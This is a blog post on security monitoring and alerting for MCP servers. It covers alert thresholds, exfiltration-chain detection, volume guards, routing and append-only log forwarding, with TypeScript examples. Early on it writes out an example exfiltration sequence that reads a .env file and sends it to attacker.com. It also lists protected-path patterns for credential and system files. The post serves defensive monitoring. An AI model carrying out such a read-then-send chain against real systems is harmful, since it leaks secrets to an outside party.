MCP Server Security Monitoring and Alerting: What to Alert On, Threshold Calibration, and How to Avoid Alert Fatigue
Most MCP servers log nothing beyond a startup message. The ones that do log usually emit raw error stacks — the wrong signal for security operations. Here is a practical framework: four alert categories, how to calibrate thresholds against real traffic, how to route alerts to the right team, and what SkillAudit checks when it grades your observability posture.
Published 2026-06-14 · 3,400 words
Why MCP monitoring is different from API monitoring
Traditional API monitoring focuses on latency, error rate, and throughput. These metrics tell you when something is broken. MCP server security monitoring needs to answer a different question: is the server being used in ways its authors didn't intend?
Two properties make MCP servers unusual from a monitoring perspective:
1. The caller is an LLM agent, not a human. A human clicking a UI generates ~1–5 API calls per interaction. An LLM agent planning a multi-step task can generate 50–200 tool calls in a single session. Burst traffic that looks like an attack in a traditional API may be a normal agentic loop. Your thresholds need to account for this.
2. Tool calls compose into emergent behaviors. A single call to read_file is benign. A single call to fetch_url is benign. A sequence of read_file(.env) → fetch_url(attacker.com, body=file_content) is a data exfiltration attack — but no individual call raises an alarm if you only look at calls in isolation. Security monitoring for MCP servers must track sessions and sequences, not just individual requests.
The SkillAudit observability axis checks for three things: whether structured security events are emitted (not just generic errors), whether the log format is injection-safe (JSON, not string concatenation), and whether logs are forwarded to an append-only external sink rather than staying on the same host being audited. Servers with no structured logging default to a MEDIUM finding on the observability sub-score.
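To make the injection-safe point concrete, here is a minimal sketch. The helper names `formatUnsafe` and `formatSecurityEvent` are hypothetical and not part of SkillAudit or any library. With string concatenation, a newline in caller-controlled input forges a second log entry; JSON serialization escapes it so one event stays on one line.

```typescript
// Hypothetical helpers for illustration only.
type SecurityEvent = { event: string; ts: number; [key: string]: unknown };

// Unsafe: caller-controlled text is spliced into the line verbatim,
// so an embedded newline starts what looks like a second log entry.
function formatUnsafe(event: string, detail: string): string {
  return `${new Date(0).toISOString()} ${event} detail=${detail}`;
}

// Safer: JSON.stringify escapes control characters, so one event
// always serializes to exactly one line.
function formatSecurityEvent(e: SecurityEvent): string {
  return JSON.stringify(e);
}

const hostile = "x\n1970-01-01T00:00:00.000Z auth_success callerId=admin";
const unsafeLine = formatUnsafe("auth_failure", hostile);
const safeLine = formatSecurityEvent({ event: "auth_failure", detail: hostile, ts: 0 });
```

The unsafe output splits into two lines when read by a line-oriented log parser, while the JSON output round-trips the hostile string as data.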
The four alert categories
Start with four categories. Every alert in your MCP server should map to one of them. If it doesn't, question whether it belongs in a security alert at all.
Authentication and authorization failures
Failed token validation, expired credentials, IDOR attempts — signals that an entity is trying to access something it shouldn't
Auth failures are the most reliable security signal because they represent a hard system boundary being tested. Every failed auth check should emit a structured event with: caller identity (or the value that was presented as identity if verification failed), the tool being requested, the resource being accessed, the specific failure reason (expired, missing, invalid format, revoked), and the caller's session state (first failure or Nth in a window).
Alert thresholds:
- P0 (page immediately): 3 auth failures from the same caller within 30 seconds, a pattern that usually indicates credential stuffing or a replay attack
- P1 (alert within 5 minutes): Any IDOR attempt — a caller accessing a resource with a valid token but for a different caller's resource ID
- INFO (log only, review in the weekly report): Isolated single auth failures, which more likely indicate a misconfigured client than an attack
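The burst threshold above can be implemented as a per-caller sliding window. This is a sketch under assumptions: the class name `AuthFailureWindow` is hypothetical, the 3-in-30-seconds values are copied from the list above, and the caller key is assumed to be an already-hashed ID.

```typescript
// Values taken from the burst threshold above: 3 failures within 30 seconds.
const WINDOW_MS = 30_000;
const BURST_THRESHOLD = 3;

interface FailureVerdict {
  countInWindow: number;
  burst: boolean; // true when the burst threshold is reached
}

class AuthFailureWindow {
  // Failure timestamps (ms) keyed by hashed caller ID.
  private failures = new Map<string, number[]>();

  // Record one failure and report whether the caller is now in a burst.
  record(callerIdHash: string, now: number = Date.now()): FailureVerdict {
    const recent = (this.failures.get(callerIdHash) ?? []).filter(
      (ts) => now - ts < WINDOW_MS,
    );
    recent.push(now);
    this.failures.set(callerIdHash, recent);
    return { countInWindow: recent.length, burst: recent.length >= BURST_THRESHOLD };
  }
}
```

In a long-running server the map would also need eviction for callers that go quiet; that is omitted here to keep the sketch short.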
```typescript
// Structured auth failure event
log.security({
  event: 'auth_failure',
  reason: 'expired',                  // expired | missing | invalid | revoked | idor
  callerId: hash(presentedCallerId),  // hashed; never log the raw bearer token
  toolRequested: 'read_file',
  resourceId: args.path,
  sessionFailureCount: session.authFailures,
  sessionAge: Date.now() - session.startedAt,
  ts: Date.now()
});
```
The IDOR case deserves special handling. When a caller presents a valid token but the resource ID belongs to a different caller, log the resource owner's hashed ID (not their raw identifier) alongside the caller's hashed ID. This creates a correlation path for incident investigation without logging PII in the alert.
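A sketch of what that IDOR event could look like. Everything named here is an assumption for illustration: `hashId`, `buildIdorEvent`, the `resourceOwnerId` field, and the `LOG_HASH_KEY` environment variable. It uses a keyed hash (HMAC-SHA-256) rather than a plain hash so that identifiers cannot be recovered by hashing guessed IDs; the post itself does not specify a hash function.

```typescript
import { createHmac } from "node:crypto";

// LOG_HASH_KEY is a hypothetical environment variable; the fallback is for local runs only.
const hashKey = process.env.LOG_HASH_KEY ?? "dev-only-key";

// Keyed hash, truncated for readability in log lines.
function hashId(rawId: string): string {
  return createHmac("sha256", hashKey).update(rawId).digest("hex").slice(0, 16);
}

interface IdorEvent {
  event: "auth_failure";
  reason: "idor";
  callerId: string;        // hashed caller
  resourceOwnerId: string; // hashed owner of the requested resource
  toolRequested: string;
  ts: number;
}

// Returns an event only when a verified caller requests someone else's resource.
function buildIdorEvent(
  callerId: string,
  resourceOwnerId: string,
  toolRequested: string,
  now: number = Date.now(),
): IdorEvent | null {
  if (callerId === resourceOwnerId) return null; // caller owns the resource
  return {
    event: "auth_failure",
    reason: "idor",
    callerId: hashId(callerId),
    resourceOwnerId: hashId(resourceOwnerId),
    toolRequested,
    ts: now,
  };
}
```

Because the same key produces the same digest for the same ID, an investigator can join the caller and owner across events without either raw identifier appearing in the log.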
Anomalous tool call patterns
Tool call sequences that deviate from normal agentic behavior — burst patterns, cross-category chains, off-hours activity
This is the hardest category to calibrate because "anomalous" depends on what normal looks like for your server. But four pattern classes are reliable signals across most MCP servers:
Burst detection: More than N calls of the same tool within T seconds from the same caller. The challenge is that LLM agents legitimately generate bursts during planning loops. The key differentiator is whether the burst contains unique arguments or the same argument repeated. A planning loop calling list_directory 10 times with different paths is normal. The same call 10 times with the same path is a loop bug or a probe.
Cross-category chain detection: A retrieval tool followed shortly by an external-network tool is the canonical exfiltration chain signature. Detecting it requires tagging each tool with its effect class (retrieval / mutation / external) and maintaining a per-session call log. The chain [retrieval, retrieval, external] within a 30-second window should trigger a P1 alert unless the caller has been explicitly granted the allow:retrieval-to-external-chain permission.
Off-hours activity: If your users are internal and primarily work 9–5, a cluster of tool calls at 3 AM is suspicious. This is easy to alert on but requires knowing your traffic baseline. Do not enable this alert until you have two weeks of normal traffic data.
Tool enumeration: A caller that invokes every tool your server exposes exactly once, in quick succession, is probing your surface. This is a reconnaissance pattern. The signature: N distinct tools called within 60 seconds with minimal arguments — args that look like the minimum required to avoid a validation error rather than real use.
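The burst-detection distinction described above (unique arguments versus the same argument repeated) can be sketched as follows. The `ToolCall` shape, the `argsKey` field, and the defaults of 10 calls in 10 seconds are placeholders chosen for illustration; the post leaves N and T to your own baseline.

```typescript
// Hypothetical shape for a logged call. argsKey is a stable serialization
// or hash of the arguments so repeated calls can be compared.
interface ToolCall {
  tool: string;
  argsKey: string;
  ts: number;
}

type BurstVerdict = "none" | "planning_burst" | "repeated_call";

// burstSize and windowMs are placeholder defaults, not recommendations.
function classifyBurst(
  calls: ToolCall[],
  tool: string,
  now: number,
  burstSize = 10,
  windowMs = 10_000,
  minDistinctRatio = 0.5,
): BurstVerdict {
  const recent = calls.filter((c) => c.tool === tool && now - c.ts < windowMs);
  if (recent.length < burstSize) return "none";
  const distinct = new Set(recent.map((c) => c.argsKey)).size;
  // Mostly distinct arguments look like a planning loop; mostly repeated
  // arguments look like a loop bug or a probe.
  return distinct / recent.length >= minDistinctRatio ? "planning_burst" : "repeated_call";
}
```

Only the `repeated_call` verdict would normally feed an alert; `planning_burst` is better kept as a metric for baseline calibration.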
```typescript
// Cross-category chain detection
// Assumes callLog is in chronological order (calls are appended as they complete)
function isExfiltrationPattern(callLog: ToolCall[]): boolean {
  const now = Date.now();
  const recent = callLog.filter(c => now - c.ts < 30_000);
  // Order matters: the external call must come after a retrieval
  const firstRetrieval = recent.findIndex(c => c.effectClass === 'retrieval');
  if (firstRetrieval === -1) return false;
  const externalAfterRetrieval = recent
    .slice(firstRetrieval + 1)
    .some(c => c.effectClass === 'external');
  const hasMutation = recent.some(c => c.effectClass === 'mutation');
  // retrieval followed by external, with no mutation = potential exfiltration
  return externalAfterRetrieval && !hasMutation;
}

// Run after each tool call that completes successfully
if (isExfiltrationPattern(session.callLog)) {
  log.security({
    event: 'chain_guard_alert',
    pattern: 'retrieval_to_external',
    callSequence: session.callLog.slice(-10).map(c => c.tool),
    ts: Date.now()
  });
}
```
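The tool enumeration signature described earlier can be approximated in a similar way. This is a rough sketch, not a tuned detector: the `minimalArgs` flag is a hypothetical field your validation layer would have to set, and the 80% coverage default is an assumption.

```typescript
interface ToolCall {
  tool: string;
  minimalArgs: boolean; // hypothetical flag: only the required arguments were supplied
  ts: number;
}

// True when most exposed tools were each called exactly once, with minimal
// arguments, inside the window (60 seconds by default, as in the text).
function looksLikeEnumeration(
  calls: ToolCall[],
  exposedTools: string[],
  now: number,
  windowMs = 60_000,
  minCoverage = 0.8,
): boolean {
  const recent = calls.filter((c) => now - c.ts < windowMs);
  const counts = new Map<string, number>();
  for (const c of recent) counts.set(c.tool, (counts.get(c.tool) ?? 0) + 1);

  // Tools touched exactly once, with only the minimum arguments.
  const probed = new Set(
    recent.filter((c) => c.minimalArgs && counts.get(c.tool) === 1).map((c) => c.tool),
  );
  const covered = exposedTools.filter((t) => probed.has(t)).length;
  return exposedTools.length > 1 && covered / exposedTools.length >= minCoverage;
}
```

A client that legitimately smoke-tests every tool at startup will match this pattern, which is one reason the routing table treats enumeration as a digest-level signal rather than a page.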
Data volume and exfiltration signals
High-volume read operations, large response payloads, and external-network calls that correlate with retrieval spikes
Tool call count alone doesn't capture exfiltration risk — a server that returns 1 KB per call is different from one that streams multi-MB files. Volume-based alerts add a second axis that catches exfiltration attempts that stay under call-count thresholds by requesting large payloads instead of many calls.
Track three volume metrics per session:
- Cumulative response bytes: Total bytes returned to the caller across all tool calls in the session. Alert if this exceeds your 99th-percentile session byte volume (establish this from baseline traffic — for most MCP servers serving LLM agents, it will be 1–10 MB per session).
- Single-call response size: If one tool call returns more than your configured ceiling (e.g., 5 MB), alert regardless of session total. A single read_file call that returns 5 MB of data is almost certainly reading the wrong file or responding to an oversized argument.
- External call byte volume: Total bytes sent in outbound requests from tools that make external network calls. A small inbound query producing a large outbound payload is a classic exfiltration indicator.
```typescript
class SessionVolumeGuard {
  private inboundBytes = 0;   // cumulative response bytes returned to the caller
  private outboundBytes = 0;  // cumulative bytes sent in outbound requests
  private readonly INBOUND_CEILING = 10 * 1024 * 1024;     // 10 MB per session
  private readonly OUTBOUND_CEILING = 1 * 1024 * 1024;     // 1 MB per session
  private readonly SINGLE_CALL_CEILING = 5 * 1024 * 1024;  // 5 MB per call

  recordResponse(toolName: string, responseBytes: number) {
    this.inboundBytes += responseBytes;
    if (responseBytes > this.SINGLE_CALL_CEILING) {
      log.security({ event: 'large_single_response', tool: toolName, bytes: responseBytes, ts: Date.now() });
    }
    if (this.inboundBytes > this.INBOUND_CEILING) {
      log.security({ event: 'session_volume_ceiling', totalBytes: this.inboundBytes, ts: Date.now() });
    }
  }

  recordOutbound(toolName: string, bodyBytes: number) {
    this.outboundBytes += bodyBytes;
    if (this.outboundBytes > this.OUTBOUND_CEILING) {
      log.security({ event: 'outbound_volume_ceiling', tool: toolName, totalBytes: this.outboundBytes, ts: Date.now() });
    }
  }
}
```
Volume alerts have a high false-positive rate in servers that legitimately process large files. Before enabling the session ceiling alert, collect at least two weeks of production response-size data, the same baseline period used for the other thresholds, and set the threshold at the 99th percentile plus 50% headroom. This approach catches true anomalies while suppressing the daily heavy-user traffic that will otherwise dominate your alert queue.
Configuration and filesystem tampering signals
Write operations on sensitive paths, permission scope escalation, and server configuration changes at runtime
If your MCP server exposes any write tools — filesystem, database, message queue — those write operations are the highest-risk surface in your server. Most write tools legitimately write to application data paths. The sensitive cases are writes to infrastructure-level paths that the tool wasn't designed to touch.
Define a set of protected path patterns per tool. Any write to a protected pattern should be blocked before the write completes and should emit a P0 alert, matching the routing table later in this post:
```typescript
const PROTECTED_PATH_PATTERNS = [
  /\.env/,                   // environment files
  /\.git\//,                 // git internals
  /\.ssh\//,                 // SSH keys
  /\/etc\//,                 // system config
  /\.github\//,              // CI/CD workflows
  /cron/i,                   // cron job files
  /\.(sh|bash|zsh|py|rb)$/,  // executable scripts
  /node_modules\//,          // dependency tree
];

function isProtectedPath(path: string): boolean {
  return PROTECTED_PATH_PATTERNS.some(p => p.test(path));
}

// In write_file handler: check before any write
if (isProtectedPath(args.path)) {
  log.security({
    event: 'write_to_protected_path',
    path: args.path,             // log the path, not the content
    callerId: session.callerId,  // should already be hashed; never log the raw identifier
    ts: Date.now()
  });
  throw new ToolError('FORBIDDEN', 'Write target is not allowed');
}
```
The block-before-write pattern matters here. Log the attempt and throw before touching the filesystem. An alert that fires after the write has succeeded is observability, not security.
A second class of tampering signal applies if your server exposes any tool that modifies its own configuration — changing rate limits, updating allowed scopes, adjusting feature flags. These operations should always require a second authentication factor beyond the standard session token (a separate admin token or an explicit confirmation parameter) and always emit a P1 alert.
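One way to sketch the second-factor requirement for configuration changes, assuming a separate admin token is the chosen factor. The function names and the `config_change_attempt` event name are hypothetical; the point is that the event is produced whether or not the change is allowed.

```typescript
import { createHash, timingSafeEqual } from "node:crypto";

// Constant-time comparison. Both sides are hashed first so the buffers
// have equal length, which timingSafeEqual requires.
function tokensMatch(presented: string, expected: string): boolean {
  const a = createHash("sha256").update(presented).digest();
  const b = createHash("sha256").update(expected).digest();
  return timingSafeEqual(a, b);
}

interface ConfigChangeDecision {
  allowed: boolean;
  // Emitted for every attempt, allowed or not, so the alert always fires.
  event: { event: "config_change_attempt"; setting: string; allowed: boolean; ts: number };
}

function authorizeConfigChange(
  setting: string,
  presentedAdminToken: string | undefined,
  expectedAdminToken: string,
  now: number = Date.now(),
): ConfigChangeDecision {
  const allowed =
    presentedAdminToken !== undefined && tokensMatch(presentedAdminToken, expectedAdminToken);
  return { allowed, event: { event: "config_change_attempt", setting, allowed, ts: now } };
}
```

The handler would pass `decision.event` to the security logger first and only then apply the change if `decision.allowed` is true.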
Threshold calibration: how to find the right numbers
Alert thresholds are where most MCP server monitoring programs fail. Thresholds set too low create an alert storm that on-call engineers learn to ignore. Thresholds set too high miss real attacks. The right approach is data-driven calibration from your own baseline, not numbers from a blog post.
Step 1 — Establish a baseline (2 weeks minimum)
Deploy structured logging for a fortnight before enabling any alerts. Log every tool call with: caller ID hash, tool name, response bytes, latency, session age. Do not alert on anything during this period. You are building the histogram of normal behavior.
Step 2 — Calculate percentile thresholds
For each metric you plan to alert on, compute p99 from the baseline. Your alert threshold = p99 × 1.5. The 1.5× headroom absorbs legitimate traffic spikes (Monday morning rush, a large automated workflow) without triggering on noise.
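The calculation in this step is small enough to sketch directly. The function names are illustrative, and the percentile uses the nearest-rank method, which is one of several common definitions; your metrics backend may interpolate and give a slightly different p99.

```typescript
// Nearest-rank percentile: the smallest sample with at least p% of
// samples at or below it.
function percentile(values: number[], p: number): number {
  if (values.length === 0) throw new Error("no baseline samples");
  const sorted = [...values].sort((a, b) => a - b);
  const rank = Math.max(1, Math.ceil((p * sorted.length) / 100));
  return sorted[rank - 1];
}

// Alert threshold = p99 of the baseline multiplied by the headroom factor.
function alertThreshold(baseline: number[], headroom = 1.5): number {
  return percentile(baseline, 99) * headroom;
}

// Example: 100 baseline sessions with 1..100 tool calls each.
const baselineCalls = Array.from({ length: 100 }, (_, i) => i + 1);
const callThreshold = alertThreshold(baselineCalls); // p99 = 99, threshold = 148.5
```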
Step 3 — Segment by caller type
LLM agents generate dramatically more traffic than human-driven integrations. If you can distinguish caller types (by token claim, by client identifier in the auth header, by call-rate signature), use per-segment thresholds. A threshold calibrated on mixed traffic will be too high for humans and too low for agents.
Step 4 – Review and re-tune after 30 days
After your first 30 days of production alerts, audit the false-positive rate. If more than 20% of P1 alerts resolve as false positives, your thresholds are too sensitive — raise them by 25%. If you have zero P1 alerts and no incidents, your thresholds may be too high — lower by 25%. Re-tune every 30 days until your false-positive rate is under 10%.
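The review rule can be written down as a small function so the adjustment is applied consistently each cycle. This is a sketch: the `AlertReview` shape is hypothetical, and the case the text does not cover (no alerts but an incident occurred) is left unchanged here and should be handled by manual review.

```typescript
interface AlertReview {
  p1Total: number;          // P1 alerts fired in the review period
  p1FalsePositives: number; // of those, how many resolved as false positives
  incidents: number;        // confirmed incidents in the period
}

function retuneThreshold(current: number, review: AlertReview): number {
  if (review.p1Total === 0) {
    // No alerts and no incidents: the threshold may be too high, so lower it by 25%.
    return review.incidents === 0 ? current * 0.75 : current;
  }
  const falsePositiveRate = review.p1FalsePositives / review.p1Total;
  // More than 20% false positives: too sensitive, so raise it by 25%.
  return falsePositiveRate > 0.2 ? current * 1.25 : current;
}
```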
Alert routing: who gets what
An alert that pages the wrong person, or pages everyone, will be ignored. Map alert severity to team before you deploy monitoring:
| Severity | Alert category | Route to | SLA |
|---|---|---|---|
| P0 | Auth failure burst (≥3 failures in 30s from same caller) | On-call security engineer + server owner | 15 minutes to acknowledge |
| P0 | Write to protected path (blocked) | On-call security engineer + server owner | 15 minutes to acknowledge |
| P1 | Cross-category chain alert (retrieval → external without chain scope) | Server owner + security team Slack channel | 4 hours to investigate |
| P1 | IDOR attempt (valid token, wrong resource) | Server owner + security team Slack channel | 4 hours to investigate |
| P1 | Session byte ceiling exceeded | Server owner | 4 hours to investigate |
| P2 | Tool enumeration pattern | Security team daily digest | 24 hours |
| P2 | Off-hours activity | Security team daily digest | 24 hours |
| INFO | Single auth failure | Log only — no alert | Review in weekly report |
Alert fatigue is a security vulnerability. If your on-call rotation is receiving more than 5 P1 alerts per day that resolve as false positives, the alert program is producing negative security value — engineers stop looking, and real attacks get lost in noise. Track your false-positive rate as a first-class metric and treat a high false-positive rate as a P2 incident.
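Keeping the routing table in code next to the event definitions makes it harder for the two to drift apart. The sketch below mirrors the table above; the target names are placeholders, and event names that do not appear elsewhere in this post (`auth_failure_burst`, `idor_attempt`, `tool_enumeration`, `off_hours_activity`) are hypothetical. Sending unknown events to the digest is an assumption, not something the table specifies.

```typescript
type Severity = "P0" | "P1" | "P2" | "INFO";

interface Route {
  severity: Severity;
  targets: string[];         // placeholder channel names
  slaMinutes: number | null; // null = no alert, weekly report only
}

const ROUTES = new Map<string, Route>([
  ["auth_failure_burst", { severity: "P0", targets: ["oncall-security", "server-owner"], slaMinutes: 15 }],
  ["write_to_protected_path", { severity: "P0", targets: ["oncall-security", "server-owner"], slaMinutes: 15 }],
  ["chain_guard_alert", { severity: "P1", targets: ["server-owner", "security-slack"], slaMinutes: 240 }],
  ["idor_attempt", { severity: "P1", targets: ["server-owner", "security-slack"], slaMinutes: 240 }],
  ["session_volume_ceiling", { severity: "P1", targets: ["server-owner"], slaMinutes: 240 }],
  ["tool_enumeration", { severity: "P2", targets: ["security-digest"], slaMinutes: 1440 }],
  ["off_hours_activity", { severity: "P2", targets: ["security-digest"], slaMinutes: 1440 }],
  ["auth_failure", { severity: "INFO", targets: [], slaMinutes: null }],
]);

// Unknown events fall back to the daily digest instead of paging anyone.
function routeFor(eventName: string): Route {
  return ROUTES.get(eventName) ?? { severity: "P2", targets: ["security-digest"], slaMinutes: 1440 };
}

// Only P0 events page the on-call rotation.
function shouldPage(eventName: string): boolean {
  return routeFor(eventName).severity === "P0";
}
```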
Integration with SIEM and incident response
Structured JSON logs are useful on their own, but they become powerful when forwarded to a SIEM (Splunk, Elastic Security, Datadog SIEM, or an open-source alternative like Wazuh). The structured log schema from earlier in this post is designed to be SIEM-friendly: every event has a consistent event field for filtering, a consistent ts field for time-series analysis, and hashed identifiers for correlation without PII.
Three SIEM use cases that are worth wiring up immediately:
Correlation across multiple MCP servers: If your infrastructure includes multiple MCP servers, a single SIEM receiving logs from all of them can detect attacks that hop between servers — a caller that fails auth on Server A and immediately tries Server B with the same credential is a credential-stuffing attack across your entire fleet, invisible if you only look at per-server logs.
Retrospective investigation: After an incident, you need to answer "what did this caller do in the 30 minutes before the alert fired?" SIEM with structured logs answers this in seconds. A server that only logs to stdout with raw error messages answers it in hours of log parsing, if at all.
Baseline drift detection: SIEM can build a rolling model of normal tool call patterns per caller and alert when a caller's behavior diverges significantly from their own baseline — a more precise signal than fixed thresholds for high-volume callers whose usage patterns are complex.
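To illustrate the idea behind baseline drift detection (not how any particular SIEM implements it), here is an in-process sketch that keeps a running mean and variance per caller and flags values far from that caller's own history. The class name, the z-score limit of 3, and the 30-sample minimum are all assumptions.

```typescript
// Running mean and variance for one caller, using Welford's online algorithm.
class CallerBaseline {
  private n = 0;
  private mean = 0;
  private m2 = 0; // sum of squared deviations from the running mean

  observe(value: number): void {
    this.n += 1;
    const delta = value - this.mean;
    this.mean += delta / this.n;
    this.m2 += delta * (value - this.mean);
  }

  // True when value is more than zLimit sample standard deviations from the mean.
  isDrift(value: number, zLimit = 3, minSamples = 30): boolean {
    if (this.n < minSamples) return false; // not enough history to judge
    const std = Math.sqrt(this.m2 / (this.n - 1));
    if (std === 0) return value !== this.mean;
    return Math.abs(value - this.mean) / std > zLimit;
  }
}
```

A caller whose sessions normally contain 9 to 11 tool calls would be flagged at 50 calls, while a caller who routinely makes 200 would not be flagged at 210. A fixed threshold cannot make that distinction.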
Log forwarding that survives an incident
One detail that matters operationally: if your logs are stored only on the MCP server's own host, an attacker who compromises the server can delete the logs before your investigation begins. Forward logs to an append-only external sink from the moment they are written. The standard pattern:
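```typescript
import pino from 'pino';
// Assumption: a CloudWatch transport that exports a stream factory, such as the
// pino-cloudwatch package. Option names vary by package, so check its documentation.
import pinoCloudWatch from 'pino-cloudwatch';

// Two destinations: stdout (for debugging) + external append-only sink
const destinations = pino.multistream([
  { stream: process.stdout },
  {
    stream: pinoCloudWatch({
      logGroupName: '/mcp-server/security',
      logStreamName: `security-${process.env.INSTANCE_ID}`,
      // Append-only is enforced through IAM: the server role gets no delete permission
    })
  }
]);

// Route events through a pino logger so the multistream receives the log
// level it uses to decide which destinations get each line.
const logger = pino({ level: 'info' }, destinations);

export const log = {
  security: (event: SecurityEvent) => logger.warn({ category: 'security', ...event })
};
```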
The CloudWatch example works for AWS deployments. For other environments: Loki with an append-only log pipeline, an S3 bucket with object lock enabled, or a managed SIEM ingestion endpoint — any option where the server process does not have delete or overwrite access to its own log store.
The three common mistakes
Mistake 1: Logging in the error handler only. If your only security events come from exception handlers, you miss the majority of attack patterns — most successful tool chaining attacks and data exfiltration attempts complete without throwing exceptions. Security events should be emitted after successful calls that match anomaly patterns, not only on failure.
Mistake 2: Including credential values in logs. The most common credential leak in MCP servers is a console.log(process.env) or an error message that includes the full token value. Security event logs should contain hashed caller IDs and argsHash (a SHA-256 of the arguments for correlation) but never the raw argument values, never the raw token, and never env-var values. See the anatomy of a credential leak post for a census of how this goes wrong across the community corpus.
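A sketch of the argsHash idea, assuming SHA-256 over a canonical serialization with sorted keys so that the same arguments always produce the same digest. The helper names and the `tool_call` event name are hypothetical.

```typescript
import { createHash } from "node:crypto";

// Serialize with sorted object keys so key order does not change the hash.
function canonicalize(value: unknown): string {
  if (Array.isArray(value)) return `[${value.map(canonicalize).join(",")}]`;
  if (value !== null && typeof value === "object") {
    const obj = value as Record<string, unknown>;
    const entries = Object.keys(obj)
      .sort()
      .map((k) => `${JSON.stringify(k)}:${canonicalize(obj[k])}`);
    return `{${entries.join(",")}}`;
  }
  return JSON.stringify(value) ?? "null";
}

function argsHash(args: unknown): string {
  return createHash("sha256").update(canonicalize(args)).digest("hex");
}

// Builds the loggable form of a call: the hash goes in, the raw values stay out.
function toLoggableCall(tool: string, args: unknown, callerIdHash: string, now: number = Date.now()) {
  return { event: "tool_call", tool, argsHash: argsHash(args), callerId: callerIdHash, ts: now };
}
```

An unkeyed hash of a short or guessable argument can be reversed by hashing candidates, so if arguments themselves may be sensitive, a keyed hash (HMAC) is the safer choice.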
Mistake 3: Alerting on every anomaly equally. Not every alert deserves a page. A server that pages on every single auth failure will create an alert storm every time a client has a stale token. Tiered severity (P0/P1/P2/INFO) with appropriate routing for each tier is what makes alert programs sustainable. Build the tiers before you enable any alerts in production.
What a monitoring-ready server looks like
After implementing the framework above, a monitoring-ready MCP server has these properties:
- Every security-relevant event emits a structured JSON log line with event, ts, hashed caller ID, and relevant context, with no raw error strings and no credential values
- Auth failures, chain guard blocks, protected-path write attempts, and volume ceiling breaches each have a named event type that maps to an alert rule
- A per-session call log tracks tool sequence and effect class for chain detection
- Alert thresholds are calibrated from baseline traffic, not from a blog post
- Logs forward to an append-only external sink that the server process cannot delete
- Alert routing is documented: P0 pages on-call within 15 minutes, P1 alerts the team channel within 4 hours, P2 batches to a daily digest
SkillAudit grade impact
The SkillAudit observability sub-score currently contributes to the Security axis.
A server that implements the full framework from this post — structured events, chain detection, external forwarding, no credential values in logs — will score between 90 and 100 on the Security axis, assuming it already passes the static checks for SSRF and command injection. Monitoring doesn't fix code vulnerabilities, but it does demonstrate operational maturity that directly affects the Maintenance sub-score as well.
Starting point: the minimum viable monitoring setup
If you are starting from zero and need a realistic first step, this is the minimum viable setup that will move your SkillAudit grade and give you genuine security value:
- Add one security logger: a thin wrapper around pino that writes JSON to stdout. No configuration beyond JSON.stringify. Do this first; it is ten lines of code.
- Instrument two events: auth_failure and chain_guard_alert. These two events catch the majority of active attacks and have clear semantics. Add them before anything else.
- Add one alert rule: page on ≥3 auth failures from the same caller in 30 seconds. Set this up in your existing alerting system (PagerDuty, OpsGenie, Slack alert bot). This is your only P0 alert for the first month.
- Forward to one external sink: whatever your existing infrastructure uses (CloudWatch, Datadog, Loki). If you have nothing, a free Datadog trial works for the first 30 days.
- Review after 30 days: look at the auth failure events. Are there any callers with repeated failures? Any cross-category chains that fired? Tune the chain detection threshold based on what you see.
Everything else in this post is additive on top of this foundation. The minimum viable setup takes 2–4 hours to implement and will surface real security signals within the first week of production traffic.